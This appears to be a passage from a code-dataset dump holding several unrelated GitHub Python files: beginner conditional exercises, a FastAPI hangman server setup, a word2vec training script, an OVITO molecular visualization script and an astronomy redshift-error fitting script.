strengths=CancerStr\n weaknesses=CancerWe\nelif user_month == \"July\" and user_day <= 22:\n astrology_sign = \"Cancer\"\n strengths = CancerStr\n weaknesses = CancerWe\nelif user_month == \"July\" and user_day >= 23: \n astrology_sign = \"Leo\"\n strengths = LeoStr\n weaknesses = LeoWe\nelif user_month == \"August\" and user_day <= 22: \n astrology_sign = \"Leo\"\n strengths = LeoStr\n weaknesses = LeoWe\nelif user_month == \"August\" and user_day >= 23: \n astrology_sign = \"Virgo\"\n strengths = VirgoStr\n weaknesses = VirgoWe\nelif user_month == \"September\" and user_day <= 22:\n astrology_sign = \"Virgo\"\n strengths = VirgoStr\n weaknesses = VirgoWe\nelif user_month == \"September\" and user_day >= 23:\n astrology_sign = \"Libra\"\n strengths = LibraStr\n weaknesses = LibraWe\nelif user_month == \"October\" and user_day <= 22:\n astrology_sign = \"Libra\"\n strengths = LibraStr\n weaknesses = LibraWe\nelif user_month == \"October\" and user_day >= 23:\n astrology_sign = \"Scorpio\"\n strengths = ScorpioStr\n weaknesses = ScorpioWe\nelif user_month == \"November\" and user_day <= 21:\n astrology_sign = \"Scorpio\"\n strengths = ScorpioStr\n weaknesses = ScorpioWe\nelif user_month == \"November\" and user_day >= 22:\n astrology_sign = \"Sagittarius\"\n strengths = SagittariusStr\n weaknesses = SagittariusWe\nelif user_month == \"December\" and user_day <= 21:\n astrology_sign = \"Sagittarius\"\n strengths = SagittariusStr\n weaknesses = SagittariusWe\nelif user_month == \"December\" and user_day >= 22:\n astrology_sign = \"Capricorn\"\n strengths = CapricornStr\n weaknesses = CapricornWe\nelif user_month == \"January\" and user_day <= 19:\n astrology_sign = \"Capricorn\"\n strengths = CapricornStr\n weaknesses = CapricornWe\nelse: \n print(\"enter a valid birthday please :)\")\n\n\nprint(\"your astrology sign is \" + astrology_sign + \"!!! \\nRead below for your strengths and weaknesses:\")\n# weaknesses and strengths based on the sign \n#Aries Taurus Gemini Cancer Leo Virgo Libra Scorpio Sagittarius Capricorn Aquarius Pisces\nprint(\"Strengths: \" + strengths)\nprint(\"Weaknesses: \" + weaknesses)\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n# -------------------------------------------- \n\n\t# Part 2: Next, we need to randomly select a response from 20 options.\n\n\t# Randomly select a number from 0 - 19 \n\t# Use that to select from the following responses:\n\t\t# 0 - It is certain.\n\t\t# 1 - It is decidedly so.\n\t\t# 2 - Without a doubt.\n\t\t# 3 - Yes - definitely.\n\t\t# 4 - You may rely on it.\n\t\t# 5 - As I see it, yes.\n\t\t# 6 - Most likely.\n\t\t# 7 - Outlook good.\n\t\t# 8 - Yes.\n\t\t# 9 - Signs point to yes.\n\t\t# 10 - Reply hazy, try again.\n\t\t# 11 - Ask again later.\n\t\t# 12 - Better not tell you now.\n\t\t# 13 - Cannot predict now.\n\t\t# 14 - Concentrate and ask again.\n\t\t# 15 - Don't count on it.\n\t\t# 16 - My reply is no.\n\t\t# 17 - My sources say no.\n\t\t# 18 - Outlook not so good.\n\t\t# 19 - Very doubtful.\n\n\t# Look up random.rand_int to see how you can use it to select a random number.\n\n # -------------------------------------------- \n\n\n\n\n\n\n\n\n\n\n\n# -------------------------------------------- \n\n\t# Part 3: Customize it!\n\n\t# Select your own theme and use case and modify your code!\n\t\n# -------------------------------------------- \n\n","repo_name":"BrandonLaRose/TeamEdgeTerm0Python","sub_path":"conditional_game.py","file_name":"conditional_game.py","file_ext":"py","file_size_in_byte":8246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"23628390614","text":"from config import DB_URL, DBPaths\nfrom tortoise.contrib.fastapi import register_tortoise\nfrom fastapi import FastAPI\nfrom src.game.routers import ws_router\n\nfrom src.users.routers import (\n fastapi_cookies,\n fastapi_users,\n SECRET,\n)\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\napp = FastAPI(\n title='HangMan WebSockets',\n description=\"API with WS for game HangMan\",\n version=\"0.0.1\"\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins='*',\n allow_credentials=True,\n allow_methods=['*'],\n allow_headers=['*'],\n)\n\napp.include_router(\n fastapi_cookies, prefix=\"/auth/jwt\", tags=[\"Auth\"]\n)\napp.include_router(\n fastapi_users.get_register_router(), prefix=\"/auth\", tags=[\"Auth\"]\n)\napp.include_router(\n fastapi_users.get_reset_password_router(SECRET),\n prefix=\"/auth\", tags=[\"Auth\"],\n)\n\napp.include_router(fastapi_users.get_users_router(), prefix=\"/users\", tags=[\"Пользователи\"])\n\napp.include_router(ws_router)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nregister_tortoise(\n app,\n db_url=DB_URL,\n modules={\"models\": DBPaths.all_paths},\n generate_schemas=True,\n add_exception_handlers=True,\n)\n","repo_name":"LucianDeveloper/HangmanWebSockets","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31980259509","text":"import numpy as np\nimport spacy\nfrom collections import Counter\nimport torch\nfrom sklearn.model_selection import train_test_split\nfrom A1P3_4 import Word2vecModel\nfrom tqdm import tqdm # For progress bars\nimport matplotlib.pyplot as plt\n\nv2i = {\n 'and': 0,\n 'hold': 1,\n 'dog': 2,\n 'cat': 3,\n 'rub': 4,\n 'a': 5,\n 'the': 6,\n 'can': 7,\n 'she': 8,\n 'he': 9,\n 'I': 10\n}\n\n\ndef prepare_texts(text): \n # Get a callable object from spaCy that processes the text - lemmatizes and determines part of speech\n\n nlp = spacy.load(\"en_core_web_sm\")\n \n # lemmatize the text, get part of speech, and remove spaces and punctuation\n \n lemmas = [tok.lemma_ for tok in nlp(text) if tok.pos_ not in [\"PUNCT\", \"SPACE\"]]\n \n # count the number of occurences of each word in the vocabulary\n \n freqs = Counter() \n for w in lemmas:\n freqs[w] += 1\n \n vocab = list(freqs.items()) # List of (word, occurrence)\n \n vocab = sorted(vocab, key=lambda item: item[1], reverse=True) # Sort by decreasing frequency\n # print(vocab)\n \n # Create word->index dictionary and index->word dictionary\n \n v2i = {v[0]:i for i,v in enumerate(vocab)}\n i2v = {i:v[0] for i,v in enumerate(vocab)}\n \n return lemmas, v2i, i2v\n\n\ndef tokenize_and_preprocess_text(textlist, v2i, window=5):\n X, Y = [], []\n n_grams = (window - 1) // 2\n\n for stc in textlist:\n lemma, _, _ = prepare_texts(stc)\n lemma = [v2i[i] for i in lemma] # transfer to indices\n\n for i, w in enumerate(lemma):\n for n in range(1, n_grams + 1):\n if i - n >= 0:\n X.append(w)\n Y.append(lemma[i - n])\n if i + n < len(lemma):\n X.append(w)\n Y.append(lemma[i + n])\n\n return np.array(X, dtype=int), np.array(Y, dtype=int)\n\n\ndef train_word2vec(textlist, window=5, embedding_size=2):\n '''\n Set up a model with Skip-gram (predict context with word)\n textlist: a list of the strings\n '''\n # Create the training data\n X, y = tokenize_and_preprocess_text(textlist, v2i) # moved to front for speed\n print (X.shape, y.shape)\n\n # Split the training data\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, shuffle=True)\n print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)\n\n # instantiate the network & set up the optimizer\n \n model = Word2vecModel(vocab_size=len(v2i.keys()), embedding_size=embedding_size)\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n\n lr = 1e-3\n epochs = 50\n bs = 4\n n_workers = 1\n loss_fn = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n\n # training loop\n batches = torch.from_numpy(X_train).split(bs)\n targets = torch.from_numpy(y_train).split(bs)\n\n progress_bar = tqdm(range(epochs))\n\n running_loss = []\n running_val_loss = []\n\n for epoch in range(epochs):\n epoch_loss = 0\n for center, context in zip(batches, targets):\n center, context = center.to(device), context.to(device)\n optimizer.zero_grad()\n logits, e = model(x=center) # forward\n loss = loss_fn(logits, context)\n epoch_loss += loss.item()\n loss.backward()\n optimizer.step()\n\n val_pred, _ = model(x=torch.from_numpy(X_test))\n val_loss = loss_fn(val_pred, y_test).item()\n\n progress_bar.update(1)\n epoch_loss /= len(batches)\n running_loss.append(epoch_loss)\n running_val_loss.append(val_loss)\n\n return model, running_loss, running_val_loss\n\n\nif __name__ == '__main__':\n with open('SmallSimpleCorpus.txt') as f:\n corpus = f.readline()\n corpus = corpus.split('. ') # separate sentences\n network, tloss, vloss = train_word2vec(corpus)\n embedding = network.embedding\n \n fig = plt.figure()\n ax = fig.subplots(1, 1, 1)\n ax.plot(tloss, 'r')\n ax.plot(vloss, 'b')\n \n \n ","repo_name":"ephemer1s/ECE1786H-Assignments","sub_path":"a1/A1P3_5.py","file_name":"A1P3_5.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1697030527","text":"#class=29\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \\n\"))\r\n\r\nif height>=120:\r\n print(\"You can ride rollercoaster\\n\")\r\nelse:\r\n print(\"Sorry, You have grow taller before you can ride.\\n\")\r\n\r\n\r\n#class=30\r\n\r\n#modula operation(remainder)\r\nprint(7%3)\r\nprint(\"welcome to my world\\nplease check any number have even or odd\")\r\nnum=int(input(\"Enter any number:-\"))\r\nif num%2==0:\r\n print(\"This is an Even Number\")\r\nelif num%2!=0:\r\n print(\"This is an Odd Number\")\r\nelse:\r\n print(\"Bye Bye\")\r\n\r\n\r\n#class=31\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\n\r\nif height>=120:\r\n print(\"You can ride the roolercoaster\")\r\n age=int(input(\"What is your age? \"))\r\n if age>=18:\r\n print(\"Please pay $12.\")\r\n elif 12<=age<=18:\r\n print(\"Please pay $7\")\r\n else:\r\n print(\"Please pay $5\")\r\nelse:\r\n print(\"Sorry, You have to grow taller before you can ride.\")\r\n\r\n\r\n#class=32\r\n\r\nheight=float(input(\"Enter your height in m: \"))\r\nweight=float(input(\"Enter your weight in kg: \"))\r\nbmi=round(weight/height**2, 2)\r\nif bmi<=18.5:\r\n print(f\"Your BMI is {bmi}, you are underweight\")\r\nelif 18.5<=bmi<=25:\r\n print(f\"Your BMI is {bmi}, you are a normal weight\")\r\nelif 25<=bmi<=30:\r\n print(f\"Your BMI is {bmi}, you are overweight\")\r\nelif 30<=bmi<=35:\r\n print(f\"Your BMI is {bmi}, you are obese\")\r\nelse:\r\n print(f\"Your BMI is {bmi}, you are clinically obese\")\r\n\r\n\r\n#class=33\r\n\r\n#leap year\r\nyear=int(input(\"Which year do you want to check: \"))\r\nif year % 4==0:\r\n if year%100==0:\r\n if year%400==0:\r\n print(\"Leap year\")\r\n else:\r\n print(\"Not leap year\")\r\n else:\r\n print(\"Leap year\")\r\nelse:\r\n print(\"Not leap year\")\r\n\r\n\r\n#class=34\r\n\r\n\r\n#add photo price\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height>=120:\r\n print(\"You can ride the roolercoaster\")\r\n age=int(input(\"What is your age? \"))\r\n if age>=18:\r\n bill=12\r\n print(\"Adult tickets $12.\")\r\n elif 12<=age<=18:\r\n bill=7\r\n print(\"Youth tickets $7\")\r\n else:\r\n bill=5\r\n print(\"Child tickets $5\")\r\n\r\n wants_photo=input(\"Do you want a photo taken? yes or no : \")\r\n if wants_photo==\"yes\":\r\n bill+=3\r\n\r\n print(f\"Your final bill is {bill}\")\r\nelse:\r\n print(\"Sorry, You have to grow taller before you can ride.\")\r\n\r\n\r\n#class=35\r\n\r\n#add extra bill price\r\nprint(\"Welcome to Python Pizza Deliveries!\")\r\npizza_size=input(\"What Size Pizza do you want? S, M AND L : \")\r\nadd_pepperoni=input(\"Do you want pepperoni? yes or no : \")\r\nextra_chesse=input(\"DO you want extra cheese? yes or no : \")\r\nbill=0\r\nif pizza_size==\"S\":\r\n bill += 15\r\nelif pizza_size==\"M\":\r\n bill += 20\r\nelif pizza_size==\"L\":\r\n bill += 25\r\nelse:\r\n bill+=25\r\n\r\nif add_pepperoni==\"yes\":\r\n if pizza_size==\"S\":\r\n bill+=2\r\n elif pizza_size==\"M\"or\"L\":\r\n bill+=3\r\n else:\r\n bill+=3\r\n\r\nif extra_chesse==\"yes\":\r\n bill+=1\r\n\r\nprint(f\"Your final bill is ${bill}\")\r\n\r\n\r\n#class=36\r\n\r\n#uses of logic\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height>=120:\r\n print(\"You can ride the roolercoaster\")\r\n age=int(input(\"What is your age? \"))\r\n if 18<=age<45:\r\n bill=12\r\n print(\"Adult tickets $12.\")\r\n elif 12<=age<=18:\r\n bill=7\r\n print(\"Youth tickets $7\")\r\n elif age>=45 and age<=55:\r\n print(\"Everthing is going to be ok. Have a free ride on us!\")\r\n else:\r\n bill=5\r\n print(\"Child tickets $5\")\r\n\r\n wants_photo=input(\"Do you want a photo taken? yes or no : \")\r\n if wants_photo==\"yes\":\r\n bill+=3\r\n\r\n print(f\"Your final bill is {bill}\")\r\nelse:\r\n print(\"Sorry, You have to grow taller before you can ride.\")\r\n\r\n\r\n#class=37\r\n\r\n#love calculator\r\nprint(\"Welcome to the love Calculator\")\r\nname1=input(\"What is your name? \\n\")\r\nname2=input(\"What is their name? \\n\")\r\n\r\ncombined_string=name1+name2\r\nlower_case_string=combined_string.lower()\r\n\r\nt=lower_case_string.count(\"t\")\r\nr=lower_case_string.count(\"r\")\r\nu=lower_case_string.count(\"u\")\r\ne=lower_case_string.count(\"e\")\r\n\r\ntrue= t+r+u+e\r\n\r\nl=lower_case_string.count(\"l\")\r\no=lower_case_string.count(\"o\")\r\nv=lower_case_string.count(\"v\")\r\ne=lower_case_string.count(\"e\")\r\n\r\nlove=l+o+v+e\r\n\r\nlove_score = int(str(true)+str(love))\r\n\r\nprint(love_score)\r\n\r\nif (love_score<10) or (love_score>90):\r\n print(f\"Your love score is{love_score}, you go together like\")\r\nelif (love_score>+40) and (love_score<=50):\r\n print(f\"Your score is {love_score}, you are alright together.\")\r\nelse:\r\n print(f\"Your score is {love_score}\")\r\n\r\n\r\n#class=38\r\n\r\n#tresure island GAME\r\nprint(\"Welcome to treasure Island.\")\r\nprint(\"Your mission is to find the treasure.\")\r\nchoice1=input('You\\'re at a crossroad, where do you want to go? Type \"left\" or \"right\".').lower()\r\n\r\nif choice1==\"left\":\r\n choice2=input('you\\'ve come to a lake. There is an island in the middle of the lake. Type \"wait\" to wait for a boat. Type \"swim\" to swim across.').lower()\r\n if choice2==\"wait\":\r\n choice3=input(\"You arrive at the island unharmed. there is a house with 3 doors. one red, one yellow and one blue. which colour do you choose?\").lower()\r\n if choice3==\"red\":\r\n print('It\\'s a room full of fire. Game Over')\r\n elif choice3==\"yellow\":\r\n print(\"You found treasure! You Win!\")\r\n elif choice3==\"blue\":\r\n print(\"You enter a room of beasts. Game Over\")\r\n else:\r\n print('You chose a door that doesn\\'t exist. Game Over')\r\n else:\r\n print(\"You got attached by an angry trout. Game Over.\")\r\nelse:\r\n print(\" You fell into a hole. Game Over\")","repo_name":"Suraj8394/by-using-Python-to-made-some-project-and-game","sub_path":"day3class28,29,30,31,32,33,34,35,36,37,38.py","file_name":"day3class28,29,30,31,32,33,34,35,36,37,38.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28658679792","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import Counter\n\nprint(\"number of shoes\")\nX = int(input())# number of shoes\nsizes=list(map(int, input().split()))\nprint(\"number of customer\")\nn=int(input())\nsizes=Counter(sizes)\npr=0\n\nfor i in range (n):\n sz,pz=map(int,input().split())\n \n","repo_name":"dattaprasadh/MLprograms","sub_path":"datta.py","file_name":"datta.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7647167867","text":"from ovito.io import import_file\nfilename=\"N100M100.data\"\npipeline=import_file(filename,atom_style=\"bond\")\n\ndata=pipeline.compute()\nmol=data.particles['Molecule Identifier']\nimport numpy as np\nnum_particles=mol.size\nmol_max=np.max(mol)\n\ndef color_rgb(i,max):\n f=float(i)/float(max)\n r=0\n g=0\n b=0\n if f < 0.25:\n r=1.0\n g=4*f\n b=0.0\n elif f < 0.5: \n r=1.0-4*(f-0.25)\n g=1.0\n b=0.0\n elif f < 0.75:\n r=0.0\n g=1.0\n b=4*(f-0.5)\n else:\n r=0.0\n g=1.0-4*(f-0.75)\n b=1.0\n return [r,g,b]\n\ndef modify(frame,data):\n color=data.particles_.create_property('Color')\n for i in range(num_particles):\n mol_i=mol[i]\n color[i]=color_rgb(mol_i,mol_max)\n\npipeline.modifiers.append(modify)\npipeline.add_to_scene()\n\nfrom ovito.vis import ParticlesVis\nparticle_vis=pipeline.source.data.particles.vis\nparticle_vis.radius=0.4\n\nfrom ovito.vis import BondsVis\nbond_vis=pipeline.source.data.particles.bonds.vis\nbond_vis.width=0.6\n\ncell_vis=pipeline.source.data.cell.vis\ncell_vis.rendering_color=(1.0,1.0,1.0)\n\nfrom ovito.vis import CoordinateTripodOverlay\ntripod = CoordinateTripodOverlay()\ntripod.size = 0.07\ntripod.offset_x = 0.02\ntripod.offset_y = 0.02\n\n\nimport math\nfrom ovito.vis import Viewport\nvp = Viewport(type=Viewport.Type.Perspective, camera_dir=(1,2,-1))\nvp.zoom_all()\nvp.overlays.append(tripod)\nvp.render_image(size=(500,500),filename=\"figure.png\",background=(0,0,0))\n\n","repo_name":"t-murash/OVITO-PYTHON","sub_path":"03Color/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12386165167","text":"import sys, os, glob, time, warnings, gc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table, vstack, hstack, join\nimport fitsio\nfrom astropy.io import fits\n\nimport evalSR\nimport importlib\nimportlib.reload(evalSR)\n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import cauchy\n\ndatadir = '/global/cscratch1/sd/jiaxi/SHAM/catalog/'\ntask = sys.argv[1]\n# \"plot\" 'random_catalogue', 'lorentzian_random', 'voigt_random'\nTYPE = sys.argv[2]\n# 'LRG', 'ELG', 'QSO', 'BGS'\ncatapath = sys.argv[3]\n# repeats_final-targets; repeats_Ashley-guess(old)\nmode = sys.argv[4]\n# 'multiple-obs'; 'one-obs'; 'inter-obs'\ndz,z,zrsel,ggzsel = {'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]}\n#-- fit a Gaussian\ndef gaussian(x,a,sigma,mu):\n return a/np.sqrt(2*np.pi)/sigma*np.exp(-(x-mu)**2/(2*sigma**2))\ndef lorentzian(x,a,w,p):\n return a/(1+((x-p)*2/w)**2)\ndef pvoigt(x,a,sigma,mu,a1):\n w = sigma*2*np.sqrt(2*np.log(2))\n return gaussian(x,a,sigma,mu)+lorentzian(x,a1,w,mu)\n #return a1*np.convolve(gaussian(x,a,sigma,mu),lorentzian(x,a/np.pi*w,w,mu),mode='same')\ndef sampling(datalen):\n Nsample = datalen*5\n simu = []\n samples = []\n bins = np.arange(-500,501,5)\n BIN = (bins[1:]+bins[:-1])/2\n #import pdb;pdb.set_trace()\n norm = len(dv)\n dens,BINS,plot = plt.hist(dv, bins=bins, histtype='step')\n cQ = 1/len(BIN)*10\n #popt2, pcov21 = curve_fit(pvoigt,BIN,dens/norm,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #import pdb;pdb.set_trace()\n\n for i in range(Nsample):\n random = np.random.uniform(low=-maxdv,high=maxdv)\n value = np.interp(random,BIN,dens/norm)\n #value = 10*pvoigt(random,popt2[3]*np.pi*popt2[1],popt2[1],popt2[2],popt2[3])\n #import pdb;pdb.set_trace()\n sample = np.random.uniform(0,cQ)\n if samplezmin)\nsel &= tcomp['ZWARN'] == 0\ntcomp = tcomp[sel]\nprint('repetitive model:',mode)\nif mode == 'one-obs':\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = tcomp['ZERR']*299792./(1+tcomp['Z_TRUTH'])\n A,B = np.unique(tcomp['TARGETID'],return_index=True)\n dv = dv[B]\n zerr = zerr[B]\nelif mode == 'inter-obs':\n A = np.unique(tcomp['TARGETID'])\n tcomp['ZERR_TRUTH'] = np.zeros(len(tcomp))\n print(len(A))\n for a in A:\n tcomp[tcomp['TARGETID'] == a]['Z_TRUTH'] == tcomp[tcomp['TARGETID'] == a]['Z'][0]\n tcomp[tcomp['TARGETID'] == a]['ZERR_TRUTH'] == tcomp[tcomp['TARGETID'] == a]['ZERR'][0]\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = np.sqrt(tcomp['ZERR_TRUTH']**2+tcomp['ZERR']**2)*299792./(1+tcomp['Z_TRUTH']) \n zerr = zerr[dv!=0]\n dv = dv[dv!=0]\nelif mode =='multiple-obs':\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = tcomp['ZERR']*299792./(1+tcomp['Z_TRUTH'])\n \n\n#ztrue = tcomp['Z_TRUTH']*1\n#ztrue,dv,zerr = np.loadtxt('{}_deltav_{}_new.dat'.format(TYPE,zrange),unpack=True)\n\nif task == 'plot':\n print('delta v: fitting')\n for jseq in range(2):\n fig,ax = plt.subplots(1,1,figsize=(9,6))\n BIN = (bins[1:]+bins[:-1])/2\n #import pdb;pdb.set_trace()\n norm = len(dv)\n dens,BINS,plot = plt.hist(dv, bins=bins, histtype='step')\n \n popt, pcov = curve_fit(gaussian,BIN,dens) \n print('Gaussian finished')\n popt1, pcov1 = curve_fit(lorentzian,BIN,dens)\n print('Lorentzian finished')\n #popt2, pcov2 = curve_fit(pvoigt,BIN,dens,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #print('Voigt finished')\n \n \"\"\"\n # manual voigt realisation\n from lmfit.models import PseudoVoigtModel\n mod = PseudoVoigtModel()\n pars = mod.guess(dens, x=BIN)\n pars['fraction'].set(value=0.1, min=0, max=0.4)\n out = mod.fit(dens, pars, x=BIN)\n #print(out.fit_report(min_correl=0.25))\n plt.plot(BIN, out.best_fit,c='green',label='PseudoVoigt')# $p_0 = {:.1f} \\pm {:.1f}$, '.format(popt1[2],np.sqrt(np.diag(pcov1))[2])+r'w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}$'.format(popt1[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov1))[1]/2/np.sqrt(2*np.log(2))))\n \"\"\"\n \n plt.plot(BIN, gaussian(BIN,*popt),c='r',label=r'Gaussian $\\sigma = {:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt[1],np.sqrt(np.diag(pcov))[1],sum((dens- gaussian(BIN,*popt))**2),len(dens)-3)) # $\\mu = {:.1f} \\pm {:.1f}, popt[2],np.sqrt(np.diag(pcov))[2], \n plt.plot(BIN, lorentzian(BIN,*popt1),c='k',label='Lorentzian w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt1[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov1))[1]/2/np.sqrt(2*np.log(2)),sum((dens- lorentzian(BIN,*popt1))**2),len(dens)-3)) #$p_0 = {:.1f} \\pm {:.1f}$, '.format(popt1[2],np.sqrt(np.diag(pcov1))[2])+r', \n #plt.plot(BIN, pvoigt(BIN,*popt2),c='g',label=r'PseudoVoigt Gaussian $\\sigma = {:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt2[1],np.sqrt(np.diag(pcov2))[1],sum((dens- pvoigt(BIN,*popt2))**2),len(dens)-3)) # $\\mu = {:.1f} \\pm {:.1f}, popt2[2],np.sqrt(np.diag(pcov2))[2], \n outliern = len(dv[(dv>-1000)&(dv<-maxdv)])\n outlierp = len(dv[(dv<1000)&(dv>maxdv)])\n plt.scatter(-maxdv,outliern,c='b',label='outliers')\n plt.scatter(maxdv,outlierp,c='b')\n plt.title(TYPE+' dv histogram ,stdev = {:.1f} km/s, {:.1f}% of outliers'.format(np.std(dv),(outliern+outlierp)/norm*100))\n ax.set_xlim(-maxdv-5,maxdv+5)\n if jseq ==0:\n log = 'lin'\n plt.ylim(0,1.8*max(dens))\n else:\n log = 'log'\n plt.ylim(1e-1,30*max(dens))\n plt.yscale('log')\n ax.set_xlabel('$\\Delta$ v (km/s)')\n ax.set_ylabel('counts')\n ax.grid(True)\n plt.legend(loc=2)\n plt.savefig('{}/{}_deltav_hist_std{:.1f}_{}_maxdv{}-{}_new.png'.format(catapath,TYPE,np.std(dv),zrange,maxdv,log))\n plt.close()\n \n print('{} in {} has {} pairs, fitting results are:'.format(TYPE,zrange,len(dv)))\n print('mu = {:.1f},sigma = {:.1f},chi2 = {:.1}'.format(popt[2],popt[1],sum((dens-gaussian(BIN,*popt))**2)))\n #print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1}'.format(sum((dens[abs(BIN)<100]-gaussian(BIN,*popt)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-gaussian(BIN,*popt)[abs(BIN)>=100])**2)))\n print('lorentizan p0 = {:.1f}, sigma = {:.1f}, chi2 = {:.2}'.format(popt1[2],popt1[1]/np.sqrt(2*np.log(2))/2,sum((dens-lorentzian(BIN,*popt1))**2)))\n print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1f}'.format(sum((dens[abs(BIN)<100]-lorentzian(BIN,*popt1)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-lorentzian(BIN,*popt1)[abs(BIN)>=100])**2)))\n #print('voigt mu = {:.1f}, sigma = {:.1f}, chi2={:.2}'.format(popt2[2],popt2[1],sum((dens-pvoigt(BIN,*popt2))**2)))\n #print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1f}'.format(sum((dens[abs(BIN)<100]-pvoigt(BIN,*popt2)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-pvoigt(BIN,*popt2)[abs(BIN)>=100])**2)))\n print('stdev = ',np.std(dv))\n\n #-- fit a Gaussian for zerr/Delta v\n ratios = np.linspace(-10,10,101)\n ratio = (ratios[1:]+ratios[:-1])/2\n ratiodens,ratiobin = np.histogram(dv/zerr,ratios)\n #ratiodens = ratiodens/sum(ratiodens)\n\n popt3, pcov3 = curve_fit(gaussian,ratio,ratiodens)\n res2 = gaussian(ratio,*popt3)-ratiodens\n\n popt4, pcov4 = curve_fit(lorentzian,ratio,ratiodens)\n res3 = lorentzian(ratio,*popt4)-ratiodens\n #import pdb;pdb.set_trace()\n plt.figure(figsize=(8,6))\n plt.scatter(ratio,ratiodens)\n plt.scatter(ratio,ratiodens,color='k')\n plt.plot(ratio, gaussian(ratio,*popt3), label=r'Gaussian $\\sigma = {0:.1f}\\pm{{{1:.2f}}}$, $\\chi^2$ /dof = {2:.1}/{3:}'.format(popt3[1],np.sqrt(np.diag(pcov3))[1],sum(res2**2),len(res2)))\n plt.plot(ratio, lorentzian(ratio,*popt4), label = 'Lorentzian w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt4[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov4))[1]/2/np.sqrt(2*np.log(2)),sum(res3**2),len(res3)))\n plt.xlabel(r'$\\Delta v$/ZERR')\n plt.ylabel('counts')\n plt.legend(loc=1)\n plt.ylim(0,max(ratiodens)*1.3)\n plt.title(TYPE+' dv/ZERR at {}1000])>0:\n random_lorentzian[abs(random_lorentzian)>1000] = cauchy.rvs(loc=0, scale=gamma, size = len(random_lorentzian[abs(random_lorentzian)>1000])) \n \n random_lorentzian_trunc = cauchy.rvs(loc=0, scale=gamma, size=len(data))\n while len(random_lorentzian_trunc[(abs(random_lorentzian_trunc)>maxdv)])>0:\n random_lorentzian_trunc[abs(random_lorentzian_trunc)>maxdv] = cauchy.rvs(loc=0, scale=gamma, size = len(random_lorentzian_trunc[(abs(random_lorentzian_trunc)>maxdv)])) \n \n random_gaussian = np.random.normal(loc=0,scale = sigma,size = len(data))\n random_stdev = np.random.normal(loc=0,scale = stdev,size = len(data))\n \n random_data = sampling(len(data))\n vsmear = []\n \n if index == 0:\n fig,ax = plt.subplots(ncols=2,nrows=1,figsize=(12, 5),sharey=True)\n den,BINS = np.histogram(dv, bins=bins)#, histtype='step',label='data')\n ax[0].plot(BIN,den/norm,'k',label='data')\n dens,BINS = np.histogram(random_data, bins=bins)#, histtype='step',label='data')\n ax[0].plot(BIN,dens/len(data),'r--',label='sampled data')\n # Lorentzian related random array\n dens,BINS = np.histogram(random_lorentzian, bins=bins)#, histtype='step',label='lorentzian')\n ax[0].plot(BIN,dens/len(random_lorentzian),'b',label='Lorentzian')\n\n # Gaussian related random array\n ax[1].plot(BIN,den/norm,'k',label='data')\n dens,BINS = np.histogram(random_lorentzian_trunc, 